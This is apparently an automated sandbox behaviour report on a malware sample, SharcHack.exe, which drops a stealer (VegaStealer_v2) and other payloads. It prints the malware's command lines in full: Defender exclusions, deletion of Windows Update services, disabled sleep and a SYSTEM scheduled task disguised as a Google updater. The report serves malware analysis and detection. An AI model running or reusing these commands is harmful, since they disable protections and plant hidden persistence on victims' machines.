Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5584:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6760:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Mutant created: \Sessions\1\BaseNamedObjects\Global\{9bad0be7-37a7-44b5-940f-7c5abae5b463}Installer
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7152:120:WilError_03

Source: C:\Users\user\Desktop\SharcHack.exe

File created: C:\Users\user\AppData\Local\Temp\3.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\v2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\v2.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SharcHack.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SharcHack.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: v2.exe, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: v2.exe	Binary or memory string: CREATE TABLE {0}(x);
Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: SharcHack.exe	Virustotal: Detection: 77%
Source: SharcHack.exe	ReversingLabs: Detection: 81%

Source: v2.exe

String found in binary or memory: /configuration/appSettings/add[@key='{0}']

Source: unknown	Process created: C:\Users\user\Desktop\SharcHack.exe "C:\Users\user\Desktop\SharcHack.exe"
Source: C:\Users\user\Desktop\SharcHack.exe	Process created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SharcHack.exe	Process created: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe "C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe"
Source: C:\Users\user\Desktop\SharcHack.exe	Process created: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe "C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Process created: C:\Users\user\AppData\Local\Temp\v2.exe "C:\Users\user\AppData\Local\Temp\v2.exe"
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Process created: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp "C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp" /SL5="$50416,29079073,832512,C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: unknown	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe ubulqosn
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
Source: C:\Users\user\Desktop\SharcHack.exe	Process created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Process created: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe "C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SharcHack.exe	Process created: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe "C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Process created: C:\Users\user\AppData\Local\Temp\v2.exe "C:\Users\user\AppData\Local\Temp\v2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Process created: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp "C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp" /SL5="$50416,29079073,832512,C:\Users\user\AppData\Local\Temp\CheatEngine75.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

